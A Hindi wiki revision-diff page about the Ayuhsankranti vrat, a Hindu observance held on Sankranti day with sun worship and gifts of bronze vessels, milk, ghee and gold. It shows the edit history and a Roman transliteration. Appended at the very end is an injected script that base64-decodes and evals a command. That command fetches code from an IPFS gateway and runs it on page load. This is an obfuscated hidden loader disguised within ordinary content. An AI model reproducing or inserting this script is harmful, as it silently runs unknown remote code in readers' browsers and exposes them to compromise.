Difference between revisions of "आयुःसंक्रान्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (आयुःसंक्रान्तिव्रत का नाम बदलकर आयुःसंक्रान्ति व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आयुःसंक्रान्ति व्रत [[संक्रान्ति]] दिवस पर किया जाता है।
 
*आयुःसंक्रान्ति व्रत [[संक्रान्ति]] दिवस पर किया जाता है।
 
*आयुःसंक्रान्ति व्रत [[सूर्य देव|सूर्य]] पूजा की जाती है।
 
*आयुःसंक्रान्ति व्रत [[सूर्य देव|सूर्य]] पूजा की जाती है।
*आयुःसंक्रान्ति व्रत में काँसे के बरतन, [[दूध]], [[घी]] एवं [[सोना|सोने]] का दान, उद्यापन, जैसा कि धान्यसंक्रान्ति में होता है, आदि किया जाता है। <ref>हेमाद्रि व्रतखण्ड (2, 737); व्रतार्क (389)</ref>
+
*आयुःसंक्रान्ति व्रत में काँसे के बरतन, [[दूध]], [[घी]] एवं [[सोना|सोने]] का दान, उद्यापन, जैसा कि धान्यसंक्रान्ति में होता है, आदि किया जाता है।<ref>हेमाद्रि व्रतखण्ड (2, 737); व्रतार्क (389</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:40, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ayuahsankranti vrat sankranti divas par kiya jata hai.
  • ayuahsankranti vrat soory pooja ki jati hai.
  • ayuahsankranti vrat mean kaanse ke baratan, doodh, ghi evan sone ka dan, udyapan, jaisa ki dhanyasankranti mean hota hai, adi kiya jata hai.[1]

tika tippani aur sandarbh

  1. hemadri vratakhand (2, 737); vratark (389

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>